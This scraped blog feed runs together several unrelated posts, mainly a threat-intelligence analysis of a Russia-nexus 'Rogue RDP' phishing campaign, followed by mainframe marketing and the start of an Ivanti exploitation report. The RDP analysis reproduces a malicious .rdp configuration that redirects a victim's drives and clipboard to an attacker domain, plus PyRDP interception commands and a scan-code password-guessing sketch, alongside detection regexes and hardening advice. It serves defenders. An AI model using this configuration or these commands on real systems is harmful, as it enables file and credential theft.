This award recognizes partners who have demonstrated exceptional commitment to driving positive social impact through innovative solutions and initiatives within their organizations.
Once again, congratulations to our 2025 Google Cloud Partner of the Year winners. It’s our privilege to recognize you for all of the groundbreaking work that you do. We look forward to another future-defining year of innovation and collaboration in the cloud.
In October 2024, Google Threat Intelligence Group (GTIG) observed a novel phishing campaign targeting European government and military organizations that was attributed to a suspected Russia-nexus espionage actor we track as UNC5837. The campaign employed signed .rdp file attachments to establish Remote Desktop Protocol (RDP) connections from victims’ machines. Unlike typical RDP attacks focused on interactive sessions, this campaign creatively leveraged resource redirection (mapping victim file systems to the attacker’s servers) and RemoteApps (presenting attacker-controlled applications to victims). Evidence suggests this campaign may have involved the use of an RDP proxy tool like PyRDP to automate malicious activities such as file exfiltration and clipboard capture. This technique has been previously dubbed “Rogue RDP.”
The campaign likely enabled attackers to read victim drives, steal files, capture clipboard data (including passwords), and obtain victim environment variables. While we did not observe direct command execution on victim machines, the attackers could present deceptive applications for phishing or further compromise. The primary objective of the campaign appears to be espionage and file theft, though the full extent of the attacker’s capabilities remains uncertain. This campaign serves as a stark reminder of the security risks associated with obscure RDP functionalities, underscoring the importance of vigilance and proactive defense.
Introduction
Remote Desktop Protocol (RDP) is a legitimate Windows service that has been well-researched by the security community. However, most of the security community’s existing research is focused on the adversarial use of RDP to control victim machines via interactive sessions.
This campaign included use of RDP that was not focused on interactive control of victim machines. Instead, adversaries leveraged two lesser-known features of the RDP protocol to present an application (the nature of which is currently unknown) and access victim resources. Given the low prevalence of this tactic, technique, and procedure (TTP) in previous reporting, we seek to explore the technical intricacies of adversary tradecraft abusing the following functionality of RDP:
RDP Property Files (.rdp configuration files)
Resource redirection (e.g. mapping victim file systems to the RDP server)
RemoteApps (i.e. displaying server-hosted applications to victim)
Additionally, we will shed light on PyRDP, an open-source RDP proxy tool that offers attractive automation capabilities to attacks of this nature.
By examining the intricacies of the tradecraft observed, we gain not only a better understanding of existing campaigns that have employed similar tradecraft, but of attacks that may employ these techniques in the future.
Campaign Operations
This campaign tracks a wave of suspected Russian espionage activity targeting European government and military organizations via widespread phishing. Google Threat Intelligence Group (GTIG) attributes this activity to a suspected Russia-nexus espionage actor group we refer to as UNC5837. The Computer Emergency Response Team of Ukraine (CERT-UA) reported this campaign on Oct. 29, 2024, noting the use of mass-distributed emails with .rdp file attachments sent to government agencies and other Ukrainian organizations. This campaign has also been documented by Microsoft, TrendMicro, and Amazon.
The phishing email in the campaign claimed to be part of a project in conjunction with Amazon, Microsoft, and the Ukrainian State Secure Communications and Information Security Agency. The email included a signed .rdp file attachment purporting to be an application relevant to the described project. Unlike more common phishing lures, the email explicitly stated no personal data was to be provided and if any errors occurred while running the attachment, to ignore it as an error report would be automatically generated.
Figure 1: Campaign email sample
Executing the signed attachment initiates an RDP connection from the victim’s machine. The attachment is signed with a Let’s Encrypt certificate issued to the domain the RDP connection is established with. The signed nature of the file bypasses the typical yellow warning banner, which could otherwise alert the user to a potential security risk. More information on signature-related characteristics of these files is covered in a later section.
The malicious .rdp configuration file specifies that, when executed, an RDP connection is initiated from the victim’s machine while granting the adversary read & write access to all victim drives and clipboard content. Additionally, it employs the RemoteApp feature, which presents a deceptive application titled “AWS Secure Storage Connection Stability Test” to the victim’s machine. This application, hosted on the attacker’s RDP server, masquerades as a locally installed program, concealing its true, potentially malicious nature. While the application’s exact purpose remains undetermined, it may have been used for phishing or to trick the user into taking action on their machine, thereby enabling further access to the victim’s machine.
Further analysis suggests the attacker may have used an RDP proxy tool like PyRDP (examined in later sections), which could automate malicious activities such as file exfiltration and clipboard capture, including potentially sensitive data like passwords. While we cannot confirm the use of an RDP proxy tool, the existence, ease of accessibility, and functionalities offered by such a tool make it an attractive option for this campaign. Regardless of whether such a tool was used or not, the tool is bound to the permissions granted by the RDP session. At the time of writing, we are not aware of an RDP proxy tool that exploits vulnerabilities in the RDP protocol, but rather gives enhanced control over the established connection.
The techniques seen in this campaign, combined with the complexity of how they interact with each other, make it difficult for incident responders to assess the true impact to victim machines. Further, the number of artifacts left for post-mortem analysis is relatively small compared to other attack vectors. Because existing research on the topic is speculative regarding how much control an attacker has over the victim, we sought to dive deeper into the technical details of the technique’s components. While the full modus operandi cannot be conclusively determined, UNC5837’s primary objective appears to be espionage and file stealing.
Deconstructing the Attack: A Deep Dive into RDP Techniques
Remote Desktop Protocol
RDP is used for communication between the Terminal Server and the Terminal Server Client. RDP works with the concept of “virtual channels,” which are capable of carrying presentation data, keyboard/mouse activity, clipboard data, serial device information, and more. Given these capabilities, as an attack vector, RDP is commonly seen as a route for attackers in possession of valid victim credentials to gain full graphical user interface (GUI) access to a machine. However, the protocol supports other interesting capabilities that can facilitate less conventional attack techniques.
RDP Configuration Files
RDP has a number of properties that can be set to customize the behavior of a remote session (e.g., IP to connect to, display settings, certificate options). While most are familiar with configuring RDP sessions via a traditional GUI (mstsc.exe), these properties can also be defined in a configuration file with the .rdp extension which, when executed, achieves the same effect.
The following .rdp file was seen as an email attachment (SHA256): ba4d58f2c5903776fe47c92a0ec3297cc7b9c8fa16b3bf5f40b46242e7092b46
An excerpt of this .rdp file is displayed in Figure 3 with annotations describing some of the configuration settings.
When executed, this configuration file initiates an RDP connection to the malicious command-and-control (C2 or C&C) server eu-southeast-1-aws[.]govtr[.]cloud and redirects all drives, printers, COM ports, smart cards, WebAuthn requests (e.g., security key), clipboard, and point-of-sale (POS) devices to the C2 server.
The remoteapplicationmode parameter being set to 1 switches the session from the “traditional” interactive GUI session to presenting the victim with only a part (an application) of the RDP server. The RemoteApp, titled AWS Secure Storage Connection Stability Test v24091285697854, resides on the RDP server and is presented to the victim in a windowed popup. The icon used to represent this application (on the Windows taskbar, for example) is defined by remoteapplicationicon. Windows environment variables %USERPROFILE%, %COMPUTERNAME%, and %USERDNSDOMAIN% are used as command-line arguments to the application. Due to the use of the property remoteapplicationexpandcmdline:i:0, the Windows environment variables sent to the RDP server are those of the client (i.e., the victim), effectively performing initial reconnaissance upon connection.
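For illustration, a minimal sketch of how the properties discussed above appear inside the .rdp file (the application title and domain are taken from the campaign; the remoteapplicationprogram alias is a hypothetical placeholder, and the actual file contains additional redirection properties):
full address:s:eu-southeast-1-aws[.]govtr[.]cloud
drivestoredirect:s:*
redirectclipboard:i:1
remoteapplicationmode:i:1
remoteapplicationname:s:AWS Secure Storage Connection Stability Test v24091285697854
remoteapplicationprogram:s:||AWSStorageTest
remoteapplicationcmdline:s:%USERPROFILE% %COMPUTERNAME% %USERDNSDOMAIN%
remoteapplicationexpandcmdline:i:0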
Lastly, the signature property defines the encoded signature that signs the .rdp file. The signature used in this case was generated using Let’s Encrypt. Interestingly, the SSL certificate used to sign the file is issued for the domain the RDP connection is made to, as in the file with SHA256: 1c1941b40718bf31ce190588beef9d941e217e6f64bd871f7aee921099a9d881.
Figure 4: Signature property within .rdp file
Tools like rdp_holiday can be used to decode the public certificate embedded within the file in Figure 4.
Figure 5: .rdp file parsed by rdp_holiday
The certificate is an SSL certificate issued for the domain the RDP connection is made to, which can be correlated with the RDP properties full address / alternate full address:
alternate full address:s:eu-north-1-aws.ua-gov.cloud
full address:s:eu-north-1-aws.ua-gov.cloud
Figure 6: Remote address RDP properties
.rdp files targeting other victims also exhibited similar certificate behavior.
In legitimate scenarios, an organization could sign RDP connections with SSL certificates tied to their organization’s certificate authority. Additionally, an organization could also disable execution of .rdp files from unsigned and unknown publishers. The corresponding GPO can be found under Administrative Templates -> Windows Components -> Remote Desktop Services -> Remote Desktop Connection Client -> Allow .rdp files from unknown publishers.
Figure 7: GPO policy for disabling unknown and unsigned .rdp file execution
The policy in Figure 7 can optionally further be coupled with the “Specify SHA1 Thumbprints of certificates representing trusted .rdp publishers” policy (within the same location) to add certificates as Trusted Publishers.
From an attacker’s perspective, existence of a signature allows the connection prompt to look less suspicious (i.e., without the usual yellow warning banner), as seen in Figure 8.
This RDP configuration approach is especially notable because it maps resources from both the adversary and victim machines:
This RemoteApp being presented resides on the adversary-controlled RDP server, not the client/victim machine.
The Windows environment variables forwarded to the RDP server as command-line arguments are those of the client/victim.
Victim file system drives are forwarded and accessible as remote shares on the RDP server. Only the drives accessible to the victim user initiating the RDP connection are exposed. By default, the RDP server can read from and write to the victim’s file system drives.
Victim clipboard data is accessible to the RDP server. If the victim machine is running within a virtualized environment but shares its clipboard with the host machine in addition to the guest, the host’s clipboard will also be forwarded to the RDP server.
Keeping track of what activity happens on the victim and on the server in the case of an attacker-controlled RDP server helps assess the level of control the attacker has over the victim machine. A deeper understanding of the RDP protocol’s functionalities, particularly those related to resource redirection and RemoteApp execution, is crucial for analyzing tools like PyRDP. PyRDP operates within the defined parameters of the RDP protocol, leveraging its features rather than exploiting vulnerabilities. This makes understanding the nuances of RDP essential for comprehending PyRDP’s capabilities and potential impact.
More information on RDP parameters can be found here and here.
Resource Redirection
The campaign’s .rdp configuration file set several RDP session properties for the purpose of resource redirection.
RDP resource redirection enables the utilization of peripherals and devices connected to the local system within the remote desktop session, allowing access to resources such as:
Printers
Keyboards, mouse
Drives (hard drives, CD/DVD drives, etc.)
Serial ports
Hardware keys like Yubico (via smartcard and WebAuthn redirection)
Audio devices
Clipboards (for copy-pasting between local and remote systems)
Resource redirection in RDP is facilitated through Microsoft’s “virtual channels.” The communication happens via special RDP packets, called protocol data units (PDUs), that mirror changes between the victim and attacker machines for as long as the connection is active. More information on virtual channels and PDU structures can be found in MS-RDPERP.
Typically, virtual channels employ encrypted communication streams. However, PyRDP is capable of capturing the initial RDP handshake sequences and hence decrypting the RDP communication streams.
Figure 9: Victim’s mapped-drives as seen on an attacker’s RDP server
Remote Programs / RemoteApps
RDP has an optional feature called RemoteApp programs: applications hosted on the remote server that behave like windowed applications on the client system, which in this case is a victim machine. This can make a malicious RemoteApp seem like a local application without ever touching the victim machine’s disk.
Figure 10 is an example of the MS Paint application presented as a RemoteApp, as seen by a test victim machine. The application does not exist on the victim machine but is presented to appear like a native application. Notice that there is no banner or top dock indicating an RDP connection, as one would expect to see in an interactive session. The only indicator appears to be the RDP symbol on the taskbar.
Figure 10: RDP RemoteApp (MsPaint.exe) hosted on the RDP server, as seen on a test victim machine
All resources used by RemoteApp belong to that of the RDP server. Additionally, if victim drives are mapped to the RDP server, they are accessible by the RemoteApp as well.
PyRDP
While the use of a tool like PyRDP in this campaign cannot be confirmed, the automation capabilities it offers make it an attractive option worth diving deeper into. A closer look at PyRDP will illuminate how such a tool could be useful in this context.
PyRDP is an open-source, Python-based, man-in-the-middle (MiTM) RDP proxy toolkit designed for offensive engagements.
Figure 11: PyRDP as a MiTM tool
PyRDP operates by running on a host (the MiTM server) that points to a server running Windows RDP. Victims connect to the MiTM server with no indication that they are connected to a relay; PyRDP seamlessly forwards the connection to the final RDP server while providing enhanced capabilities over the connection, such as:
Stealing NTLM hashes of the credentials used to authenticate to the RDP server
Running commands on the RDP server after the user connects
Capturing the user’s clipboard
Enumerating mapped drives
Streaming, recording (in video format), and taking over sessions
It’s important to note that, from our visibility, PyRDP does not exploit vulnerabilities or expose a new weakness. Instead, PyRDP gives granular control to the functionalities native to the RDP protocol.
Password Theft
PyRDP is capable of stealing passwords regardless of whether Network Level Authentication (NLA) is enabled. If NLA is enabled, it captures the NTLM hash via the NLA exchange, as seen in Figure 12. It does so by interrupting the original RDP connection sequence and completing part of it on its own, thereby allowing it to capture hashed credentials. The technique works in a similar way to Responder. More information about how PyRDP does this can be found here.
Figure 12: RDP server user NTLMv2 Hashes recorded by PyRDP during user authentication
Alternatively, if NLA is not enabled, PyRDP attempts to interpret the keyboard scan codes it receives when a user tries to authenticate, converting them into virtual key codes and thereby “guessing” the supplied password. The authors of the tool refer to this as their “heuristic method” of detecting passwords.
Figure 13: Plaintext password detection without NLA
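To make the heuristic concrete, here is a toy sketch of the idea in Python, using a small subset of PC/AT set-1 make codes for the US keyboard layout; this is illustrative only and is not PyRDP’s actual implementation:

# Toy illustration of scan-code "guessing" (not PyRDP's actual code):
# map PC/AT set-1 keyboard make codes to characters to reconstruct typed input.
SCANCODE_TO_CHAR = {
    0x10: "q", 0x11: "w", 0x12: "e", 0x13: "r", 0x14: "t",
    0x15: "y", 0x16: "u", 0x17: "i", 0x18: "o", 0x19: "p",
    0x1E: "a", 0x1F: "s", 0x20: "d", 0x21: "f", 0x22: "g",
    0x2C: "z", 0x2D: "x", 0x2E: "c", 0x2F: "v", 0x30: "b",
}  # subset of the US layout, for brevity

def guess_typed_text(make_codes):
    """Map observed make codes to characters; unknown codes become '?'."""
    return "".join(SCANCODE_TO_CHAR.get(code, "?") for code in make_codes)

# Key presses observed during authentication reconstruct to a candidate password
print(guess_typed_text([0x19, 0x1E, 0x1F, 0x1F]))  # -> "pass"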
When the user authenticates to the RDP server, PyRDP captures these credentials used to login to the RDP server. In the event the RDP server is controlled by the adversary (e.g., in this campaign), this feature does not add much impact since the credentials captured belong to the actor-controlled RDP server. This capability becomes impactful, however, when an attacker attempts an MiTM attack where the end server is not owned by them.
It is worth noting that during setup, PyRDP allows credentials to be supplied by the attacker. These credentials are then used to authenticate to the RDP server. By doing so, the user does not need to be prompted for credentials and is directly presented with the RemoteApp instead. In the campaign, given that the username RDP property was empty, the RDP server was attacker-controlled, and the RemoteApp seemed to be core to the storyline of the operation, we suspect a tool like PyRDP was used to bypass the user authentication prompt to directly present the AWS Secure Storage Connection Stability Test v24091285697854 RemoteApp to the victim.
Finally, PyRDP automatically captures the RDP challenge during connection establishment. This enables RDP packets to be decrypted if raw network captures are available, revealing more granular details about the RDP session.
Command Execution
PyRDP allows for commands to be executed on the RDP server. However, it does not allow for command execution on the victim’s machine. At the time of deployment, commands to be executed can be supplied to PyRDP in the following ways:
MS-DOS (cmd.exe)
PowerShell commands
PowerShell scripts hosted on the PyRDP server file system
PyRDP executes the command by freezing/blocking the RDP session for a given amount of time, while the command executes in the background. To the user, it seems like the session froze. At the time of deploying the PyRDP MiTM server, the attacker specifies:
What command to execute (in one of the aforementioned three ways)
How long to block/freeze the user session for
How long the command will take to complete
PyRDP is capable of detecting user connections and disconnections to RDP sessions. However, it lacks the ability to detect user authentication to the RDP server. As a user may connect to an RDP session without immediately proceeding to account login, PyRDP cannot determine authentication status, thus requiring the attacker to estimate a waiting period following user connection (and preceding authentication) before executing commands. It also requires the attacker to define the duration for which the session is to be frozen during command execution, since PyRDP has no way of knowing when the command completes.
The example in Figure 14 relays incoming connections to an RDP server on 192.168.1.2. Upon connection, it then starts the calc.exe process on the RDP server 20 seconds after the user connects and freezes the user session for five seconds while the command executes.
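For reference, a sketch of what such a deployment could look like on the command line, assuming PyRDP’s documented payload options (delay and duration are given in milliseconds):
pyrdp-mitm.py 192.168.1.2 --payload "calc" --payload-delay 20000 --payload-duration 5000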
A clever attacker can use this capability of PyRDP to plant malicious files on a redirected drive, even though PyRDP cannot directly execute them on the victim machine. This could facilitate dropping malicious files in locations that allow for further persistent access (e.g., via DLL sideloading, or malware in startup locations). Defenders can hunt for this activity by monitoring file creations originating from mstsc.exe. We’ll dive deeper into practical detection strategies later in this post.
Clipboard Capture
PyRDP automatically captures the clipboard of the victim user for as long as the RDP connection is active. This is one point where the attacker’s control extends beyond the RDP server and onto the victim machine.
Note that if a user connects from a virtual environment (e.g., VMware) and the host machine’s clipboard is mapped to the virtual machine, it would also be forwarded to the RDP session. This can allow the attacker to capture clipboard content from the host and guest machine combined.
Scraping/Browsing Client Files
With file redirection enabled, PyRDP can crawl the target system and save all or specified folders to the MiTM server if instructed at setup using the --crawl option. If the --crawl option is not specified at setup, PyRDP will still capture files, but only those accessed by the user during the RDP session, such as environment files. During an active connection, an attacker can also connect to the live stream and freely browse the target system’s file system via the PyRDP-player GUI to download files (see Figure 15).
It is worth noting that while PyRDP does not explicitly present the ability to place files on the victim’s mapped drives, the RDP protocol itself does allow it. Should an adversary misuse that capability, it would be outside the scope of PyRDP.
Stream/Capture/Intercept RDP Sessions
PyRDP is capable of recording RDP sessions for later playback. An attacker can optionally stream each intercepted connection and thereafter connect to the stream port to interact with the live RDP connection. The attacker can also take control of the RDP server and perform actions on the target system. When an attacker takes control, the RDP connection hangs for the user, similar to the freeze observed during command execution.
Streaming, if enabled with the -i option, defaults to TCP port 3000 (configurable). Live connections are streamed on a locally bound port, accessible via the included pyrdp-player script GUI. Upon completion of a connection, an .mp4 recording of the session can be produced by PyRDP.
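Putting the pieces together, a sketch of an interception setup using the options discussed in this section (the target address is a placeholder):
pyrdp-mitm.py <target-rdp-server> --crawl -i
pyrdp-player   # separate GUI tool to watch, browse, or take over live sessions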
Detection and Hardening
This section focuses on collecting forensic information, hardening systems, and developing detections for the RDP techniques used in the campaign.
Security detections detailed in this section are already integrated into the Google SecOps Enterprise+ platform. In addition, Google maintains similar proactive measures to protect Gmail and Google Workspace users.
Log Artifacts
Default Windows Machine
During testing, limited evidence was recovered on default Windows systems after drive redirection and RemoteApp interaction. In practice, it would be difficult to distinguish between a traditional RDP connection and one with drive redirection and/or RemoteApp usage on a default Windows system. From a forensic perspective, the following patterns are of moderate interest:
Creation of the following registry keys upon connection, which give insight into the attacker server address and the username used:
HKU\S-1-5-21-4272539574-4060845865-869095189-1000\SOFTWARE\Microsoft\Terminal Server Client\Servers\<attacker_IP_Address>
HKU\S-1-5-21-4272539574-4060845865-869095189-1000\SOFTWARE\Microsoft\Terminal Server Client\Servers\<attacker_server>\UsernameHint: "<username used for connection>"
The information contained in the Windows Event Logs (Microsoft-Windows-TerminalServices-RDPClient/Operational):
Event ID 1102: Logs attacker server IP address
Event ID 1027: Logs attacker server domain name
Event ID 1029: Logs username used to authenticate in format base64(sha256(username)).
Heightened Logging Windows Machine
With enhanced logging capabilities (e.g., Sysmon, Windows advanced audit logging, EDR), artifacts indicative of file write activity on the target system may be present. This was tested and validated using Sysmon file creation events (event ID 11).
Victim system drives can be mapped to the RDP server via RDP resource redirection, enabling both read and write operations. Tools such as PyRDP allow for crawling and downloading the entire file directory of the target system.
When files are written to the target system using RDP resource redirection, the originating process is observed to be C:\Windows\system32\mstsc.exe. A retrospective analysis of a large set of representative data consisting of enhanced logs indicates that file write events originating from mstsc.exe are a common occurrence but display a pattern that could be excluded from alerting.
For example, multiple arbitrarily named terminal server-themed .tmp files following the regex pattern _TS[A-Z0-9]{4}\.tmp (e.g., _TS4F12.tmp) are written to the user’s %APPDATA%\Local\Temp directory throughout the duration of the connection.
Additionally, several file writes and folder creations related to the protocol occur in the %APPDATA%\Local\Microsoft\Terminal Server Client directory.
Depending upon the RDP session, excluding these protocol-specific file writes could help manage the number of events to triage and spot potentially interesting ones. It’s worth noting that the Windows system by default will delete temporary folders from the remote computer upon logoff. This does not apply to the file operations on redirected drives.
Should file-read logging be enabled, mstsc.exe-originating file reads could warrant suspicion. It is worth noting that file-read events are noisy by nature due to the way the Windows subsystem operates; caution should be taken before enabling this logging.
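As a sketch of that hunting logic (assuming a CSV export of Sysmon events with EventID, Image, and TargetFilename columns; the file name and field names are placeholders):

# Sketch: surface Sysmon file-creation events (event ID 11) originating from
# mstsc.exe, excluding the protocol-specific writes described above.
import csv
import re

EXCLUDE_PATTERNS = [
    re.compile(r"\\AppData\\Local\\Temp\\_TS[A-Z0-9]{4}\.tmp$", re.IGNORECASE),
    re.compile(r"\\AppData\\Local\\Microsoft\\Terminal Server Client\\", re.IGNORECASE),
]

def suspicious_writes(csv_path):
    with open(csv_path, newline="", encoding="utf-8") as f:
        for event in csv.DictReader(f):
            if event.get("EventID") != "11":
                continue
            if not event.get("Image", "").lower().endswith("\\mstsc.exe"):
                continue
            target = event.get("TargetFilename", "")
            if any(p.search(target) for p in EXCLUDE_PATTERNS):
                continue
            yield target  # candidate attacker-written file

for path in suspicious_writes("sysmon_events.csv"):
    print(path)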
.rdp File via Email
The .rdp configuration file within the campaign was observed being sent as an email attachment. While it’s not uncommon for IT administrators to send .rdp files over email, the presence of an .rdp attachment from an external sender address may be an indicator of compromise. The following regex patterns, when run against an organization’s file creation events, can identify .rdp files being run directly from Outlook email attachments:
/\\AppData\\Local\\Microsoft\\Windows\\(INetCache|Temporary Internet Files)\\Content.Outlook\\[A-Z0-9]{8}\\[^\\]{1,255}\.rdp$/
/\\AppData\\Local\\Packages\\Microsoft.Outlook_[a-zA-Z0-9]{1,50}\\.{0,120}\\[^\\]{1,80}\.rdp$/
/\\AppData\\Local\\Microsoft\\Olk\\Attachments\\([^\\]{1,50}\\){0,5}[^\\]{1,80}\.rdp$/
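A minimal sketch of running those patterns, translated into Python regex syntax from the /.../ form above, over file-creation event paths (one path per line on stdin; the input source is an assumption about your telemetry pipeline):

# outlook_rdp_hunt.py - flag .rdp files created under Outlook attachment paths.
import re
import sys

PATTERNS = [
    re.compile(r"\\AppData\\Local\\Microsoft\\Windows\\(INetCache|Temporary Internet Files)\\Content.Outlook\\[A-Z0-9]{8}\\[^\\]{1,255}\.rdp$"),
    re.compile(r"\\AppData\\Local\\Packages\\Microsoft.Outlook_[a-zA-Z0-9]{1,50}\\.{0,120}\\[^\\]{1,80}\.rdp$"),
    re.compile(r"\\AppData\\Local\\Microsoft\\Olk\\Attachments\\([^\\]{1,50}\\){0,5}[^\\]{1,80}\.rdp$"),
]

for line in sys.stdin:
    path = line.strip()
    if any(p.search(path) for p in PATTERNS):
        print("possible .rdp launched from Outlook attachment:", path)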
System Hardening
The following options could assist with hardening enterprise environments against RDP attack techniques.
Network-level blocking of outgoing RDP traffic to public IP addresses
Disable resource redirection via the Registry
Key: HKEY_LOCAL_MACHINE\Software\Microsoft\Terminal Server Client
Allow .rdp files from unknown publishers: Setting this to “disable” prevents users from running unsigned .rdp files as well as files from untrusted publishers.
Specify SHA1 Thumbprints of certificates representing trusted .rdp publishers: A way to add certificate SHA1s as trusted file publishers
Computer Configuration -> Administrative Templates -> Windows Components -> Remote Desktop Services -> Remote Desktop Session Host: policies for enabling or disabling:
Resource redirection
Clipboard redirection
Forcing Network Level Authentication
Time limits for active/idle connections
Blocking .rdp file extension as email attachments
The applicability of these measures is subject to the nature of activity within a given environment and what is considered “normal” behavior.
YARA Rules
These YARA rules can be used to detect suspicious RDP configuration files that enable resource redirection and RemoteApps.
This campaign demonstrates how common tradecraft can be revitalized with alarming effectiveness through a modular approach. By combining mass emailing, resource redirection, and the creative sleight-of-hand use of RemoteApps, the actor was able to leverage existing RDP techniques while leaving minimal forensic evidence. This combination of familiar techniques, deployed in an unconventional manner, proved remarkably effective, demonstrating that the true danger of Rogue RDP lies not in the code, but in the con.
In this particular campaign, control over the target system appears limited; the main capabilities revolve around file stealing, clipboard data capture, and access to environment variables. It is more likely this campaign was aimed at espionage and user manipulation during interaction. Lastly, this campaign once again underscores how readily available red teaming tools intended for educational purposes are weaponized by malicious actors with harmful intentions.
Acknowledgments
Special thanks to: Van Ta, Steve Miller, Barry Vengerik, Lisa Karlsen, Andrew Thompson, Gabby Roncone, Geoff Ackerman, Nick Simonian, and Mike Stokkel.
Modernizing mainframes has been a slow and expensive process for too long. Today, we’re launching new solutions that bring the combined strength of Gemini models and our partners’ technologies and services to accelerate mainframe modernization.
Google Cloud generative AI products for mainframe modernization
Google Cloud currently offers three products for mainframe customers looking to reimagine their mainframe applications (significantly change the code logic and design), focusing on assessment, code transformation and testing.
1. Google Cloud Mainframe Assessment Tool (powered by Gemini models)
Google Cloud’s Mainframe Assessment Tool (MAT), now generally available, allows customers to thoroughly assess and analyze their entire mainframe estate, including applications and data, enabling informed decisions on the optimal modernization path. MAT provides in-depth code analysis, clear code explanations, summarized application logic and specifications, automated documentation creation, identification of application dependencies, and generation of initial test cases. This accelerates understanding of the mainframe code and jumpstarts the modernization process. Learn more.
2. Google Cloud Mainframe Rewrite (powered by Gemini models)
To modernize your mainframe applications, Google Cloud’s Mainframe Rewrite, now available in Preview, helps developers transform and reimagine legacy mainframe code into modern languages, such as Java and C#. Mainframe Rewrite provides an IDE environment for developers to iteratively modernize legacy code, then test and deploy the modernized application in Google Cloud. Learn more.
3. Dual Run
To de-risk the modernization journey, customers can use Google Cloud Dual Run to thoroughly test, certify, and validate the modernized mainframe applications. Dual Run allows users to verify the correctness, completeness, and performance of the modernized code during migration and before the new application goes live in production.
By replaying live events from the production mainframe onto the modernized cloud application, Dual Run compares the output between the two systems to detect any differences. Learn more.
Get started with Google Cloud Mainframe Assessment Tool, Mainframe Rewrite and Dual Run.
Now you can use our partners’ technology, too
For customers who want to take a more interactive and incremental approach to mainframe modernization, our partner Mechanical Orchard offers a platform that rapidly rewrites mainframe applications into idiomatic modern languages without changing the logic. Once this is achieved, the modern code lends itself to more rapid transformation. This kind of gradual transformation is also the foundation of the AI-accelerated Mainframe Modernization collaboration between global consultancy Thoughtworks and Mechanical Orchard.
Mechanical Orchard’s modernization platform combines data capture agents with a highly disciplined methodology to modernize legacy systems incrementally and non-disruptively. It reconstructs system behavior from real data flows, rewriting components piece by piece using generative AI into modern, idiomatic, and deterministic code. By shifting integration and testing earlier, it also reduces risk and ensures old and new code are functionally equivalent, refining itself until it matches the legacy system’s output. Workloads are migrated individually to the cloud production environment. This approach reduces project risk and disruption and can provide faster time to value.
The primary goal is to create a functional equivalent of the legacy system, ensuring that the new code produces identical outputs for every input. Mechanical Orchard supports COBOL-era systems and can generate code in languages like Java, Python, and others.
Google’s leading delivery partners go further to accelerate and de-risk modernization
Our new Mainframe Modernization with Gen AI Accelerator program adds another vital ingredient – the strong experience and capable teams of our expert delivery partners, who will bring the above tools to life for customers. We are thrilled to welcome Accenture, EPAM, and Thoughtworks to the program. They bring rich, practical experience in how best to use these AI-powered solutions to maximize modernization. Their experience in establishing modern engineering practices and providing comprehensive enablement for customer teams will empower organizations to fully embrace their cloud-native future and achieve lasting success.
The program has three phases:
Highly detailed assessment: This phase analyzes the environment using the Google Mainframe Assessment Tool (MAT), enhanced with Gemini models and combined with the partners’ expertise. From this assessment, customers receive detailed documentation about their mainframe applications (a knowledge base and explainability of the mainframe applications), modernization recommendations, and a modernization plan with estimated timelines, resources, and specific approaches.
Proof of value stage
Executing the modernization at scale
For a limited time, qualified customers can access this assessment (typically done in four to eight weeks) conducted by select partners at no cost (excluding underlying Google Cloud infrastructure usage).
Put us to the test
Google Cloud and partners are ready to apply generative AI to one of the most important modernization challenges. Let’s start with an assessment. For more details and inquiries please write to mainframe@google.com.
Get started with Google Cloud Mainframe Assessment Tool, Mainframe Rewrite and Dual Run.
Written by: John Wolfram, Michael Edie, Jacob Thompson, Matt Lin, Josh Murchie
On Thursday, April 3, 2025, Ivanti disclosed a critical security vulnerability, CVE-2025-22457, impacting Ivanti Connect Secure (“ICS”) VPN appliances version 22.7R2.5 and earlier. CVE-2025-22457 is a buffer overflow vulnerability, and successful exploitation would result in remote code execution. Mandiant and Ivanti have identified evidence of active exploitation in the wild against ICS 9.X (end of life) and 22.7R2.5 and earlier versions. Ivanti and Mandiant encourage all customers to upgrade as soon as possible.
The earliest evidence of observed CVE-2025-22457 exploitation occurred in mid-March 2025. Following successful exploitation, we observed the deployment of two newly identified malware families, the TRAILBLAZE in-memory only dropper and the BRUSHFIRE passive backdoor. Additionally, deployment of the previously reported SPAWN ecosystem of malware attributed to UNC5221 was also observed. UNC5221 is a suspected China-nexus espionage actor that we previously observed conducting zero-day exploitation of edge devices dating back to 2023.
A patch for CVE-2025-22457 was released in ICS 22.7R2.6 on February 11, 2025. The vulnerability is a buffer overflow with a limited character space, and therefore it was initially believed to be a low-risk denial-of-service vulnerability. We assess it is likely the threat actor studied the patch for the vulnerability in ICS 22.7R2.6 and uncovered, through a complicated process, that it was possible to exploit 22.7R2.5 and earlier to achieve remote code execution.
Ivanti released patches for the exploited vulnerability and Ivanti customers are urged to follow the actions in the Security Advisory to secure their systems as soon as possible.
Post-Exploitation TTPs
Following successful exploitation, Mandiant observed the deployment of two newly identified malware families tracked as TRAILBLAZE and BRUSHFIRE through a shell script dropper. Mandiant has also observed the deployment of the SPAWN ecosystem of malware, as well as a modified version of the Integrity Checker Tool (ICT) as a means of evading detection.
Shell-script Dropper
Following successful exploitation of CVE-2025-22457, Mandiant observed a shell script being leveraged that executes the TRAILBLAZE dropper. This dropper injects the BRUSHFIRE passive backdoor into a running /home/bin/web process. The first stage begins by searching for a /home/bin/web process that is a child process of another /home/bin/web process (the point of this appears to be to inject into the web process that is actually listening for connections). It then creates the following files and associated content:
/tmp/.p: contains the PID of the /home/bin/web process.
/tmp/.m: contains a memory map of that process (human-readable).
/tmp/.w: contains the base address of the web binary from that process.
/tmp/.s: contains the base address of libssl.so from that process.
/tmp/.r: contains the BRUSHFIRE passive backdoor.
/tmp/.i: contains the TRAILBLAZE dropper.
The shell script then executes /tmp/.i, which is the second stage in-memory only dropper tracked as TRAILBLAZE. It then deletes all of the temporary files previously created (except for /tmp/.p), as well as the contents of the /data/var/cores directory. Next, all child processes of the /home/bin/web process are killed and the /tmp/.p file is deleted. All of this behavior is non-persistent, and the dropper will need to be re-executed if the system or process is rebooted.
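Although the dropper cleans up after itself, a quick filesystem triage sketch can still be useful against an acquired image; absence of these paths proves nothing, but leftovers from an interrupted run are worth escalating. The mount point and script name below are assumptions:

# trailblaze_triage.py - check a mounted ICS filesystem image for leftovers.
import os

ROOT = "/mnt/ics_image"  # assumption: acquired appliance image mounted here
ARTIFACTS = ["/tmp/.p", "/tmp/.m", "/tmp/.w", "/tmp/.s", "/tmp/.r", "/tmp/.i"]

for rel in ARTIFACTS:
    if os.path.exists(ROOT + rel):
        print("leftover dropper artifact:", ROOT + rel)

# The dropper also clears /data/var/cores; an unexpectedly empty directory
# alongside other indicators may be notable.
cores = ROOT + "/data/var/cores"
if os.path.isdir(cores) and not os.listdir(cores):
    print("note: /data/var/cores is empty (the dropper clears this directory)")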
TRAILBLAZE
